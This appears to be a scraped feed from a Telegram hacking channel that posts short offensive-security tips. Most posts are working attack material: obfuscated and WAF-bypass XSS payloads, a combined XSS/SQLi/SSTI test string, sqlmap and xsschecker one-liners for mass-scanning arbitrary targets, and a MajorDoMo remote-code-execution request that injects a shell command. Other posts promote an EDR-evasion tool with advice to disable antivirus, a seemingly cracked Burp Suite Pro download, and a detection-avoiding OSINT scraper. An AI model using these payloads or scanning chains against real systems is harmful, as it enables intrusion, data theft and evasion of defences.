0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
123 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
XSS Tip 🥵

If alert() is being converted to ALERT() and you can use
Like onerror="

𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"

#XSS #tip
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3❤‍🔥3🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
CrimsonEDR

💬
CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.

🔼 Installation:
⚪️ Install dependancy:
sudo apt-get install gcc-mingw-w64-x86-64
⚪️ Download repository
⚪️ Compile the project:
cd CrimsonEDR;
chmod +x compile.sh;
./compile.sh

⚠️ Warning:
Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

💻 Example:
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

😸 Github

⬇️ Download
🔒 LearnExploit

#C #Simulate #Malware #Dev

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥31👍1
Payload for XSS + SQLi + SSTI/CSTI !

'"><svg/onload=prompt(5);>{{7*7}}

' ==> for Sql injection

"><svg/onload=prompt(5);> ==> for XSS

{{7*7}} ==> for SSTI/CSTI

#XSS #SQLI

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥31
SQLMap from Waybackurls

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

#Sqlmap #BugBounty #Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
5🔥32👍1
xss oneliner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln

⬇️ Download ( Tools )
🔒 BugCod3 ( ZIP )
🔒 LearnExploit ( BOT )

#XSS #BugBounty #Oneliner #Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥432👍2
👁 Burpsuite Pro 👁

🔥 v2024.3.1

🔔 BurpBountyPro_v2.8.0

📂 README (en+ru) included, plz read it before run BS.

🔼 Run this version With Java SE JDK 22

⬇️ Download

#Burpsuite #Pro #Tools

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
42👍2🔥2
CVE-2024-31497: Critical PuTTY Vulnerability Exposes Private Keys

Link

#cve
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍1
یه سرچ انجین جالب که میتونین توش مثل گوگل رایت اپ ها و پیلود ها و .... رو پیدا کنید 👌

Link

#writeup #پیشنهادی
——————‌
0Day.Today
@LearnExploit
@Tech_Army
5❤‍🔥1👍1
SQLMap from Waybackurls ⚡️

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

#sql #sql_injection #tip
——————‌
0Day.Today
@LearnExploit
@Tech_Army
6
VormWeb - Tor search engine ⚡️

volkancfgpi4c7ghph6id2t7vcntenuly66qjt6oedwtjmyj4tkk5oqd.onion

#Tor #Darkweb
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍5❤‍🔥1
MajorDoMo thumb RCE

GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1``

#rce #Poc #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍3❤‍🔥2
Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'

#Fuzz #tip
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍21🆒1
Do you know that sqlmap has its own crawler? Run in the background easily:

sqlmap -u 'https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12

#sql #sql_injection
——————‌
0Day.Today
@LearnExploit
@Tech_Army
4❤‍🔥1👍1🔥1
Stored Xss payload 🔥

Payload for bypass waf:

<Img Src=OnXSS OnError=confirm("@Learnexploit")>

#xss #Bypass #WAF #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
5
Xss Payload 💎

j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:console.log(location)

#xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
4
XSS could be be triggers in url itself, no need for parameter injection ⚡️

Payloads:


%3Csvg%20onload=alert(%22@Learnexploit88%22)%3E


%3Cimg%20src=x%20onerror=alert(%22@Learnexploit%22)%3E

#Xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
4👍1
🌐 Ominis OSINT: Secure Web-Search 🌐

📊 Features:
🚀 Enhanced User Interface: Enjoy a redesigned interface for a seamless experience, suitable for both novice and experienced users.
🔎 Expanded Digital Reconnaissance: Conduct thorough investigations with advanced tools to gather and analyze publicly available information from diverse online sources.
💡 Threading Optimization: Experience faster execution times with optimized threading, improving efficiency and reducing waiting periods during username searches.
📊 Detailed Results: Gain comprehensive insights from search results, including detailed information extracted from various sources such as social profiles, mentions, and potential forum links.
⚙️ Proxy Validation: The tool validates proxies for secure and efficient web requests, ensuring anonymity and privacy during the search process. This feature enhances the reliability of the search results by utilizing a pool of validated proxies, mitigating the risk of IP blocking and ensuring seamless execution of the search queries.
🕵️‍♂️ Human-like Behavior Mimicking: To mimic human-like behavior and avoid detection by anti-bot mechanisms, the tool randomizes user agents for each request. This helps in making the requests appear more natural and reduces the likelihood of being flagged as automated activity.
🛡 Randomized Proxy Agents: In addition to proxy validation, the tool utilizes randomized proxy agents for each request, further enhancing user anonymity. By rotating through a pool of proxies, the tool reduces the chances of being tracked or identified by websites, thus safeguarding user privacy throughout the reconnaissance process.
🔍 Username Search: Searches a list of URLs for a specific username. Utilizes threading for parallel execution. Provides detailed results with URL and HTTP status code.

🔼 Installation:
cd Ominis-Osint
pip install -r requirements.txt
python3 Ominis.py


😸 Github

⬇️ Download
🔒 BugCod3

#Python #Osint #Search #Engin #Tools

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥622👍2